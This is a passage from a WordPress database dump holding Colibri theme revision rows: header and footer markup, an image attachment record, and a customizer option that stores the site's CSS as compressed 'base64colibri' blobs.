d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2024-11-07 12:22:25','2024-11-07 17:22:25','',25,'https://gsudice.dataconn.net/?p=1847',0,'revision','',0),(1848,1,'2024-11-07 12:22:25','2024-11-07 17:22:25','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2024-11-07 12:22:25','2024-11-07 17:22:25','',29,'https://gsudice.dataconn.net/?p=1848',0,'revision','',0),(1849,1,'2024-11-07 12:22:25','2024-11-07 17:22:25','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2024-11-07 12:22:25','2024-11-07 17:22:25','',28,'https://gsudice.dataconn.net/?p=1849',0,'revision','',0),(1850,1,'2024-11-07 12:28:14','2024-11-07 17:28:14','','istockphoto-2015429231-612x612','Vector flat illustration in black color. Avatar, user profile, person icon, profile picture. Suitable for social media profiles, icons, screensavers and as a template.','inherit','open','closed','','istockphoto-2015429231-612x612','','','2024-11-07 12:28:14','2024-11-07 17:28:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2024/11/istockphoto-2015429231-612x612-1.jpg',0,'attachment','image/jpeg',0),(1851,1,'2024-11-07 12:31:50','2024-11-07 17:31:50','{\n    \"colibri-wp::page_content\": {\n        \"value\": {\n            \"options\": {\n                \"css_by_partials_id\": \"base64colibriH4sIAAAAAAACA91dy3biOBD9Gi+VoyqVXss8-mMOIaTNaRz6NO6Z5O97YZImwcF2SUqXZsEGXKB7S7qqhy0af9Mgom4QG3Pd+JsGcbdfr3YKtVrDu-cfNofv-f7H8S3EBrHB2wax299vd5uT9816v9ve-9w2qK8O-ctuo06-U+1-9ZufDerG3zT29qlB3aD+b-vQt425blCD1g3aBnVjTi543G2eh8-18bX61e-fXaK6g7p8mb8brsbG3w2DPxkZFUBLYtGGAmiDVLT+MthLoPwkJvsFkJY7wy-3xSUGic8gVcog5WXQ8hm0lTJoExl8JXEQpA8bFKoWHZNTVC06OaT2q-vdps838PApqQt9OO-n5i8DVC3GBJ-FWn0Wv9ZnMa-PzGQgeG5DfDd-IrxZvPiRh7PPutWzOucpg1MmUcHxpS9A+nPN2KDOvZAgkK7UeJfQfI7I8xH5CubVOWAwfMRgJDhx+Vr5bNx-OZNA1ULCigJXqTecGG+8RYR2JCK0-F3H1rDrnI6+VU+rf7ffVv12--TPod+uv79cBHU7aV4hIYsns-2CbVial7KHFZYfVliZYYVVbeAjCv9H4QgJUzLUF2dZ1Wav-1rVCq3-WtWCL4DWS0WLCYIlqVC0yB3JlZu3YCuMBFtBPXKDraAeSVxEaeAcpAHVZVYFA6oTJgoPL0+rbrtWBlR3sUh9ddj2mz+A3tmpdrP91vYfMXXbp9dPzHWD2mj943lqxRpQHTPNN6A6kSpkQHUAy8poBlQ3lf2P2jiGTVhug8B3EoIIVR0BZRJAGaGgTIKnDMjTahrRasqv1SRXq4mp1ZRbq4mv1SRVq2lady+BApEyQKoDmwDKSgUVF+5cNL1zjdrM2YnfFMqPKJRXncmsUF51Rpw808j9ZKSzgyctCfzJbCE9Ic6XMVmpmJbGoqRVN11VGbFxDJuw3GZaBZZPSJQXLZEZWY5GHZjpOxl1kJe+kxsB6fggnUSQMHYjFCCyb88bbCusb80c+Oy7XABRrUMCiaFWEqcHHpdwCCkkQrUsQm4aYwqNsVoaY6aSNaAbU0o3-VDD5+Nzs55ekMjsvJHPn6BOrQFSaIRqaYSce45Ta+79REfjanl0uXmMKTzGanmMeZc1hgQaMdRKI4bM09GkyKOpVh5njHzRdDSUQiNVSyNlptGm0GirpdFmXtWUEjtStbEjZY4dKUUcqVpxpNyxI-kUHn21PPrMPNqU+WirnY82cbN+y7XDWFUyoFqDzVxhf-1WiR2S49hcEcROMGJc1nk5WnmOlUPmSj1aL34KU8BSnTv0+ZoXUK29LTBPvRU7TUMJJQpyhSj4Eni9WLzRFMAbjVy8sQTeKHeb0SUEC7RcxYLcxy+9fqtcxIglECMKRhyKIA5yERsqgdiQXMRUZB2T4HUMRZIgkJsEBU4O5B3DKBInb9KaZcUZICx9yuUoWYZlFTlWxnKsiIULOHluCKwB+pTkeEZVTWpynLUgOKTbRQTMCa7i+CKVOi+4UueL+NgL9nGRGggILoJAKOLjINjHsYiPo2AfxyI+jnJ9jLqEj1GDYMS2CGK5xR8sUvxBwcUfhCI+BsEFPsfqgQWWVWR16SLnt1Ajy4qTbSIr20RgZbaexaHneZnFIfdEhlfrWlNARMicApaoUgquURYpUQquUJbJ7+VuriUaK4L7KkXaKoK7KkWaKoJ7KkVaKoI7KlRCr0iuXtkSemXl6pUtoVdWrl65Enrl5OoVp+HE6m2xWluszhZx0hrL6fJZDhGO1eNjtfhYOTKHCJ+S3flqkzsPuR4KD3bsRnXLPz4j2DlZnTFXxsij1uY9QSNY9v+sDbYV8+gzzVCiOHKMDUX2DB1s5Z3WY8fOJLJGrSH3IWHDl4o8UsuaOZWIESMqwBGJpcgVQOvEomU+gD-Yztjir5y4f0ibOXaf6R-SZv7cPMV2euRwdKcDW7EHW3lHj1k-ItlgveFHT4OxJKj+7jcEFH9bEnkAAA==\",\n                \"css_by_rule_id\": \"base64colibriH4sIAAAAAAACA+1dTZOjOBL9LXsgomoicAiBEByrq2ci9jSHveyeJmRbtjWNwQGq7qr59XvAdoMNWGkEmOqMmOmucWn0kcpMvUzlkx3+xaHUDxxKHf-F4V8cStey+Kazw-EjSh1KHfrqUKrFMpH6+vN9tlSJrH3Ov5a-8ll3z-4qS9QyVw4li0J-JNL1mUOJw7847DV1KHEoEanaC62y1F2-5UKrLHX8F4cSsmCF41caHsR6rdKtq7ND2YKSw3tji1xtd7ps47GWNstM62x-o6NEbtr6WYrVt22evaVrd5UlWV4207lIi4PIZarbWqu92MqydZql8tSMfy1bV0W2c1PxXW2FVln6V6HV6ttHXZKvN9u3ir15-g71N5vNZrMBzr55gzxiIPyrRsvs3S12Yp39OCrC4f38Z1D5Od8uxRNx6Ov53wV7dii5lChUvU2U9mqpJiuttBl7t23Nt2L64WBOhYOdCr9cr5bv2hWJ2h6dyUqmWua1Fe-kTy8h3nRW++VepW61wVtaSN1XsSpLjMBLjI6md7HQvXivTZTfULJTbw4liyTbZq6W7-qy0wuHEG6ijTDsVFypaeWXkEGvvZCW79pdy1VWPSWunNAmS7VbqH+OTooGfYzuLHRz07O0Tzfm1Sjp2--PxQYAVmU64J3bTQghhMC224IZxmAzjGfmaQICXWJALpdYnR5rPBTunp0Hnp03tw2g4CVShxLH-72c3lp9P--n4tjW3cv0zV1lqRYqlfn5929JrYVDSaIqvyw7rHwkzj8V37ctjnuK2TiULESeZz-cH7k4HMo+W5xHvl0+UVaiI1L94fn2iTXk2hK1WL3luUz1XwexlX8pLfePI3j-97Yp+i+77Huls6mnaijHS32Zh0hnp+XT+o+7-UVDYoDdDPkvW1S2Y5mI1bex-csD+ZOH9h+P6S8G8A+fQKtPUqn6Uv-F8V+WcpPlsguJXmYwfqi13p1SSsShrCEVNP5irsLAfKvSxjTMCHNcFFmi1q5YafVdujXLSFQpd7HRN8zhvJbqP-CBmje4OSv5Y6e0vCcjuczytcxdnR3cinpcJxzPrQr9kRh0lsiNdnOxVm-FsUuHsrbGudruzFqXLW-PtGxnMNcym2fQ47GheZfGEji2NxdCIjcmMkjkplUEY5hSOQ05ijUZjQUxqHy7fIq8EkR65IQmCX++x8iqTtkf1Z91wPD6YcrbE4Re0H4g5tvlU0hK6YRHKUWBMeQePtY444bW1VqNIYbftQYo9PoLCXj00PRR5Nw1s4pO9LDjh9yY00f8rlvUCu6nd920XkcHtAMbWUNQI8AcrxPm1FVDPHk0cuhr9c8FfTaDSUWWqPVAMObGAd6t0T3KDiZysUbVCT7xJRcPeGC9flYZjpnWfbAzqOXkQQ+NHhpuZ5Yc8kBGMHBp2DHv1ZGpPLZoT1R2lYWxw7tDCa2XhZU5hupfCxI8T58VbI5IN2Kvko9yaX8eZOpQ8h+RFte1LT8q4XbYVDOhc5EWmyw-+pS3w0HmK1F0lslcoedEpbJ2Le4tmNzXm0itZe4WB7FS6bbZhu6rJLLs8e+P5jpzJKPPf6ro+LPIb-r4t3e8++m9RG+tse+0De9vWs452tKkpdC2+SxsBY8gCGoJgZKxc7xdVjOx1bbYKqrJFGpS3YG-3wqtNh-uKku1TI9T2iTy3ZXp+u7C24e4PjKYof1bJePK30cV0QPcutkMCcdR05bwZXxlMIqjLmAEP4KH+IgmKH3uKdFxEDVQuhPDfKN84hSyNYiWcMt7yQrV0HbQ+XATbLveGF8beorx8eJ5E+XtQTvxwbQT3802m2KVS5ka4xlK6Rc-uCcjXEm8+8cs7r-U-pDlWqTaIHCozPbP7zJPxIdx6VMDa9hajt4-lqPv3J3YL9-yrcxdtcpS4OQactfe8ygVkG31wB23SK03LI2lkh6wWNKzVC5psrCr+6zWpUErK01GB9xdtVVhevA6TM9KJabJ+i5v0q5Xt1FJ0lbye5XLYLdTGSaPP8BL5isioZcZ0WoytIl73MOjD-aKR8AG6zkEn0Lh3Pid4NcKAm6Tyh-wrusLPjzrHg60OZhVb0tkN+Z1BybnPVj15gPeuZ3TsOqDaDB3AubrB3Pj6zMwX58R54Ho4lPMBkKkbccVJrVazVct7c55SGn0JoSyyYvqHmKqNgmjDyfSX8AupvVRNinp9I7qTzh9166OPpAPemif85g+ZhxS+hz1ekBWoUFqw6MmNRj0pliD3sXi9YAiIhGJSJ+U4N05u87R++TtjAvRO2cwUN256fCdqbVpbeaOqktGPgPrEO0c7fwT2jmehWgjn9dGHoF0MMVM8LhDU56pKfdItntD3VQwOljP-mA9D3bBzAa7YGaDvULPwPe6jHc9Vwe7SLpJnhygzLzHdzgws6wvdyjZeXZemy87ozY78212FtjsjNnsLLTY2eGevnoY5WBXywx8tcxiN3vT15CpcgSyi2coS0iVyPfzC3iENLkGd1+43c06tmVuN94hGWpPaQguP6JhaP4aQqdDvlE62mdVHL6qq6PpclO91i9KOp8EvslJ4Fv9fgAaRsMpR6fFnyUX-4y8du5HQ8D1m+O-pJl+cvyXRBTaXe1Usn5uYYQCvg6oNoEZ2TPlwxk0H660iPChuo4o+Nt+IhpZxpKtXuwP9sfLH19H92IRjQeTt08MLDvyyWCW7RmZ9nEGMzLtyAd-X0vke82lm9lBrJQ+PmXhTfNqs9-V6XWlvN+d1Znnu83+ja4BYhj05ebI99ysheiD+oL60qQvK3HQ6pp7dfk6h6m79txNLvby303u7B9XpetTxObW-dnFUzs6F2mRCC3-++QRh7Ln6mf-O33W2IGb5Wqr6odD5Qdi9B2l+Xb5kwD33Hq4NPCCur5iocMSPbNEfMe8er5e6Jlm429Poc+LhwTw5OGNaZjb8aWReYZ5+dtzMLHLPliDwrEGdShZaPmuT9Vp7kakq49TnR85CL27tNxC59k32cWZKFu4iUrl39nJ+lSqtBJJW8OVONxsV9mVyGbUHPk+XHR+89Xfz+1VWiRqZeIn-abEYL-urh+pTFRx7M-VH4djp2tVGHeZGXYpV2r-c-9s7A6D7w5zKFmoVZbWwxTeyJ3Mt8snL-RPb6eFp8ehL8y4SmMsCdjtTEbDE7Jpmm03y+fpAl4kHm2EIlspkbjdEr-9qOlDcFYtqGww2HVmBH+oIAr8ucXNt7i7TYsM8CxzKI3gFOLomkP82ZJnwXDJym725lnE0dTJsyCanROI4ZocY-IMkyEWkiFBjMkz1BeQvthNngUxJs8weYbJs5GSZ-BnJCJGMOBwKI0Y-I6TedayXcyzmjxjnvXkGfOmTJ4xeFaYUfsyoJPKAJ4yYf4sEoiN07Sa3htrBEwg1lUWngBjAca+GMtYiGVYgLEv6gtIX+zGvizA2BdjX4x9x4p94ffrbB7362zw2++xRkB4XFdZ+CUnCxEeI9yxAXdChMeoLyB9sQyPQ4THCI8RHo8Fjzkca-B5wGM+OHgdaQSExzWVHe6JgCiE3-aF3twqz0L4pVmIVIpXh9KYgPUjJtbvXMsup7pvjAmFy4Dal8GUd66xBy6oiD3yycuQY2+w99NijxqUIccenbgM+TiDGR0GsefDNdnHXBPmDvrnDmLPx1wT6gtIX6zmmmLPx1wT5pow1zROrin2AjjWQN5jKToGFx2zVTdcdnWw253dcNBjk4aDHL47s0iiNk-TZopztBEwiVpX2QiushHGfYjjbeD4COM+1BeQvliO+yKM+zDuw7hvrLgvhmONeB7wOB4cvI40AsLjmspS+AUfJQiPEe5YgDuUIDxGfQHpi114TAnCY4THCI9HgscUXlRGvVnA48ZpWgWvY42A8LiusvAaQEoRHiPcsQF3KMJj1BeQvliGxxThMcJjhMdjwWN4hTL15wGP-cHB60gjIDyuq+xg350eU3ghGGVzIyXQEL7IEAsFHUpjDr+44BaZSTZWMByNiBvRiPjkNCI+OxoRhx-SHGlEGODZCPA40ohQX2D6YjchwJFGhAkBTAiMlRDgcBoRRxpRKTp49Mjt0Yi4XRoRt08j4pPSiDg87OWhfRmEk8oATqXi86BS8cGJTmONgNm+usrCqVQcqVQYy1iJZZBKhfoC0xfLsS9SqTD2xdh3tNgXTqXi86BS8cGJTmONgPC4prIR-EYyQioVwh0bcCdCKhXqC0xf7MLjCKlUCI8RHo8FjyM4lSqaB5UqGpzoNNYICI-rKgunUkVIpUK4YwXuIJUK9QWmL5bhMVKpEB4jPB4NHsOrtKN5UKmiwYlOY42A8LiussNRqSJ4MVw0OypVBK8pi355KhX-+n8Q46FMKxcBAA==\",\n                \"global_css\": \"base64colibriH4sIAAAAAAACA+2dzXLjKBeGr4aqpKtQySDJ8TKdzPpbfBeQwhKyqUbgkfAkmaufhWRb-waBiSc9iy63E3jPewCJBxRJACEQv5QgfhHBHn7CVApFmKAlQCHAfwAU-gD4WUj1APAzJ5WC6Z7x7BGgF4DCYA8-LlUgE92KKATrnyB+EQCFAIUFKXdMwK1UShYAPwMUovDwAXBdZv3auBiRbIKlkh8L8faWSqGoUOdQ3Uod6xfPGnagrp+pFA8ky5jYQU5zVUuuWoqdIiXb7UfKzEcd8X8JBQexmiKtUHAYC8Q-U06q6gfAr5X65BSC+LVu8vavuEwJh70CwR7uuNwSDlVJRMUUk2L6N5Bwfu23wzZtlciOJVFMijqXMIirXrO9H+CWy-QX3B6VkgKgsP+jtzfOxK9mTAd7UsEtSX-tSnkU2SNAL5fyOeO0I5AzTt-ezsodkxcRmEouy9ohQBiHmK5Jp1daZVlBdrQuK6SgjrPBz3v5Fy07WS2WymV6rNxIkVSxv6hBY48lcq3G0O+1GidbOj1b7rYP63oso039uULo0Uk-B6xqjjN5VJwJaj6MuymYjMhWWVUSUR1ISYUyzKsuJsuMllDJA3xnmdo3Z-zeKapV6rrNS9lKffImcCU5y8bKlWy3Vxqx63K60evSOvHrmUXDQFNQ10FTXMcCp7lOC3Ca6zcAp-l0-rca0dOnMhfaU+c2F9rjZ5VuY+d5rnE8Ws4mXWuNMHr5cZrkQfwHwK8gfgEInXOsv4L49dIUleTsXN3DLLgnFUwlZ9uS1apwNZLHHU3H39XxApzQFTaGC13hf9+cvmj0-DfD-zfD-0tmeNtzjftI9rO-3dnIPwvozvl6pyJdhAAodKw4CiWjMRzRzpbL9NefR6no10cJD1+GX8Zz0KQWWg5G+ZrGm7V3MPoWjt2gHLoVyiEXKLdKUANxcVj-Z7O5A5hDhjA3P2juBubGbPqDuenovmBu2oEXmJsO7xvmkDeYQ95gDt0c5iymhuUwh5zDHPIAc8gLZnmOYgBzNhQx50B7DprUwhZolCSrZOUdjb6FYzcwh28Fc9gNzK1qhkvw6fMOWA6bstzsmLkflhux6ZHlJqN7Y7lJB35YbjK8b5bD3lgOe2M5fHuWWz4zLGc57JzlsAeWw14oy3MUE5azgIg5B9pz0KRWtJyMNjTdUOSdjL6FYzcsF92K5SKH11hXUdJcbEXJHbBcZMhy82PmblhuzKY-lpuO7ovlph14Ybnp8L5ZLvLGcpE3lotuznIWM8Nyloucs1zkgeUiL5TlOYoBy9lAxJwD7TloUiu22eXKn3L-f332LRy7Ybn4ViwXu73ImkSn-8R3QHOx8c7c3Ki5o525oU2fO3NT0f3tzE058LQzNxXeN83F3mgu9kZzsYeducVzw3Kai53TXOyB5mIvnOU5itHO3HKMmHOgPQdNaiXL2QiFiMSRdzb6Fo7d0FxyK5pLXNAcbmAuaj6fojtAucQQ5eaHzN2g3JhNfyg3Hd0Xyk078IJy0+F9o1ziDeUSbyiX3BzlLCaG5SiXOEe5xAPKJV4gy3MUA5SzYYg5B9pzUPOcDYQbJYDC4F3KVBYFLVMKKyVLCoVULKUAvVwKtksBFAaX554Ee1jRtH7cRsjE4ahA-FN9HijAr9VxWzB1ekbHmBY8kB2tfU9pDmUbJpmRdSyn4TI4gZK5o2tV9dqIWDjQqa7hojldL-ehJ6DhhInDUVkY0aqv6wMg3BwIi4+oqwoaXkhAsoxmb0q+paRcZEZXQud4OTJYcZbREpZE7BadbbQ1zPzsici4raGTyC3vi5uB--ALb30Ov-rW5-Crb30O-dz6rDmPXxheu8IJxbUrnB+k5A4Zxmzbaw4zs9e8krwl41xrB2v5+Saxll8+NGxa5UatcatWMCBMB+MhGDybzIHU8n7WzcxBRi4yMeRxN8cvcdhnXTmr45M46DuT7FxlZbyacdCLfUHrfuwLLu9Js1yd5eguN9M1oYPu7OlZ92ZPz5KoHPSlUYLOEjNfVbvqy7aim95sK9oSsna67tJ0mN6C-QkH3TqUtO7XoeTyjjXN2GGmLjNcstvjAmKHmvY0O9S0wFrTpF0m6zTJRftnbrv4LOqyj8+iTjpZM2+n+S7M099DKK33KLVseNqxNPDiZf-SwM-tdzMNzBjtbZoe3pUiJSyJYmIH8DPAz1uay3LZwW2qZeoPhdWBCKc2xyRNH4+3PLlDufDK8ammd6thRrmV4YzyGdvlbvvw1BwOm3h4WNhmIUVFFl6sOlW9-aMbrdNzwRJnKXuCOEtZcINmZg4yMsrE9+OpJy0feXAoZXZMVQVQyNnpG0DhHl2azd-5olecCXI+E5AdheJYbGlZBemxLKlYdHndVQirbEgnltX4NI5xz2eiVBYFFQrmsiwuc21QKVJWAIVkUQtdFzV-su1J--Reo+pA0lp39AVRSh5qwc3U+6Ha76XaDF-a1LlEfPoLNU7E7kh2FFbvTKV73c593zNFl6wwzlk8zawq9NYeLS6dW8hwmitYkowdq7pwNC1ZLwbahWdXHLorEw2nposLfUnd-Jvi2k1gsvqYcGs6MANOxA4yRYurB8kq0niJ2pPGgTQp1Hph21P-WNvK7LNvMZdCwZwUjH-W1f53oAKg8P9EVJ0AuRQKvtOLzygMhwUq9nfToquk55AzQeG+JbAKkk6BHiKc7sN9OmFvsnkczYfcLidFPxTMaCrbr2sbjOx+5rS4lng8lThAOMRkk0ejmR40Xv03aPdv0MPBHnJKMv8tgK+0QIBii84ud9uHpHmkdxIP7lTqNMHlj8l-43GwX91V9+MArzX6H80mP3OrWjd3dFe5oyDRGfurCDtJHt9Z8jq5o9hJ6pHf1BMXpzw3Iz6+s8xXWmd7N72e3Ffut+7y1ir3zNoFYQI2P4QVE7v6racFYeKyCH6Zr0bKdF9vTPXq3Wo1uzCNywqjYhndkjLYcrk7fWmWB8uT1VLvNkn7ZtQYoBig3gjh9KNZYjX-yFHJThFYVFCjWEE+4CBa783O9Zu9z59RWNCMEYDCh4KJdu118nT4eAQoJCIDKHzoia9ChA8fj3Wmpd2OR6IzRpLfZIxgHGDsc5icA46PlN7X9oDp6qyTtasBgXUGBP5NBsQqDH0Ohybc7GBA6B8BoRQmJoAAAA==\",\n                \"sheet_rules\": \"base64colibriH4sIAAAAAAACA+1d3ZebNtP-azinvWAPGr4vWSdut2-StNmkedub58ggGxKMeEDYu-nrnwvv2hgGI2y8sbu6aopZpBmNRr-5lAag2beae6vZEw0giTb-1czAtDSYbP5PPOZs+3zzj5jnesxoxIqnH57fzXjE7qLG25ZlmXpMGq+uGm+RG4J8rKy99TRLYrQ-Bvbumf1Gc99oMEHJsrd-UorHtEbX88s0C1kpeNH+pRRJ+O2x-XxGw2+LgldZ1P4t5Gn9U0+TNufz+Xw+f-rfzWTtiQaQ0yhKskX7O4Ln7Yc5FXHj2yuaVqzJ6NqzLbON9uAzLgRfnm2Y2khLFiW0PdCSzxJsSV6MKy-DlH2e7HNmxh-uYxrxdXtEltFZynYyJoqKbf8upY+s2N8rW7HNC0ajjjlsx02rpphau2nayExfYFHA2P5QZYlo-H3+cObVGj58kSxi0R4d3Rl2Y2zJIVI2P9MIan-K7M+Bul4UNCtzWrBMoJzuOFszukoWVCQ8a8w3L3hetofmK1akNMd1Q+PcQn67F7QQQVM4kuWSRQkVLH1szKKM+foTz2-pjtw5TcvdZ9dJ1GL-jD9stVdNbfFKfGozIeULrpc5DZNsoS9ZVrVX-iT8AAh+gB1+OAhn6n-fDTScvjULeSZokrHiyyBmIQfDfyua7n9kfzUSwZblH6z4WDtWyPbXmBfJd54Jmv5Sk6Cd7luxQiRh16+7v77LMlYc-sSBV8KqRPcxPrvtz5JaE6Nh6DcOUHrsdI7+0EnqukuOcFbDQSbiWrJDqxVb+Tt5D7t6bDbeJEb7Gdi7ZwfNArdvtz4TH6TJImvMOmSZaFlC-Vw+bsNIcTrkabVsnh0dBk-EypBlEc0EdrBUO8rqojUSQMDRzGloS-KvUWxyIsyU2rXySPo1cmeU091C1IA14HS3ek93r28HpnzB5bDbTiF8Yg8C0y81OThS5Q8aY38hOiGaYA9iZFRmI+tmt9ftGEWW8gXXa1OuWymPOV8UNI8fZf03lubeipgt2U3IU16UN5bmvsHx-eARy+Q7G7Z3DtkydSse0z2dW8Du3QJ+33oMMwvPq1wOm89nVakNZT8SvIiTiPXuf1FU7ATA0CkczpiuXAfZ9I4EZrOMPqLKnIZyHmpXj11vRGzqItjUReh0ZegkownPuMBRdBwlqLwOPLCkvq1g1HlhlIdIrDcARnl9Z4gFvUGmLXCpe4FOAQKJYAhTl7RYJJnkUXXIaXg+j-GxQ3TJ0YhUyDulh45wdMDhYDTqHItknHNdyBkXxhiwFvVPJ9m3Ych2zfb5aE80AMdokjYuACYWopULmpVzXiwb71Z5zoqQls0gwZwuk-Sx8fKHnGUaGPc0K5uenyRjvzLpc2Orjg6ScWNjqysEK+43XvLxWIZEWY4yg3ZamgqGGr4rzLc0gjlmaO5kRYuEZsLossyWLKtuKyF4FoQiWbEXn8j+dMpqVjvg6tkF40eEkWBv0-LG6CsWM-qTocFEA6PxnxvD+hkJFzeI0-Gzd2hMrVjMfgLb3gxd-8fPJ8ve8FQObMmPFbhzjN69EDquwc+8W2UW76y7VHIC+6bSqXrA3ukB6JKPspq9Z1l1F-Lsxdkc8xUrdDafs1DoM15E59scvYo5yTJWvEd14deqFMn8ccIzsQuoPw83T9mDzraT2--o8Kyuw97EQVvnpY6aN91r+zJDjrtpasJiHiTuZQT3TX8gp8vBv2LF2-mchbgrmLVi-0XEChbpNBTJim1OTTCwx7q+Z0VspT0UyYr9UvAqR7-deH2x-+IOeeDsFAXNyqSWnLJFsvVlKPVFwdcaGIuCr-V5wZf6AecNCmX2zvEDOSwxX3+Yz8uwYCx7z7LqQ3NiMS11Pp+HNFvRUhd0lrKxQxc+4ivxB-hK-F5fidnnK9n40jA-CT4q0WPTHNHp2TJSiYE8BLv28KDfszcDmT8vup7TjKXSRFtjEk0wotH0ZJn8ZMsenkTRTagzJqFYvgXBEi6ITMaF5YwYkiB6bLpj0mphtGJRZWLJ0OoeES3upnTMQEUrSZQYyEOwaw-t3gNPMmTczS9vzE3gj8kuB2MXFsEiUiEsf9xNYBlj0ooFsQgWxSIyYSzbOC1+P9jdiCG7dZwI1mV99VnG4w2WhDz7kO8jqLOQNJ5B2R5GCvs2s+Ce4GnIi2hHfX9YcvsXw9CNPeZ2AGw7YHnEBGS2A+mjWfBcn9FCLomoL+F6DJjr6jHxMSZg2Jd4MkzoDeUNNd1mKQ2-nVpXhTnF7VFDR0dHM+zT4kijFp2MQcRRSkQ68V2ltl97avu8StPbtg7Ys-9HToUaN0sdMKMYUKPYl9GY5oUmA6nsGyz1sz-TdhQZw3wQgPkgQMbxYvc6XpKQZ3qalGKEfJw0GSBMPzIT48g8iShZJbhXusO9im+YBsDDp0iOSKvpIl5qwCN5EjOZdSTGwc9rYKMEbevq3nRxfvzhO+oeT1ylIzMbm2QMHU4CE5+nMppc1s5NUMO5Y4lPaZLgtQmbJ2k6KN-myISHo8c5ImmD-mRuwtDE8Z-i0RsfPxjGz0NVxcj87ox1YXuhccw9nc5Zc+yCRklVXgQiGqqinhDDcdbiUSHVHvokWX7hxHWpKyVQ5+M5zpzrlqejPVsvYnadpUTr1Gz1Hb8OnhvtPBa0gK+rXACf+wlnVRfEHZqOK5OWc77E62bmeCk6UkGv3vBre9QwF0ApaCEGOkGTkGfvdib3fkavSERLnb1r2+d4XCtj6y9JVs8w3veiZnzK07T1c+cm2Y0Ox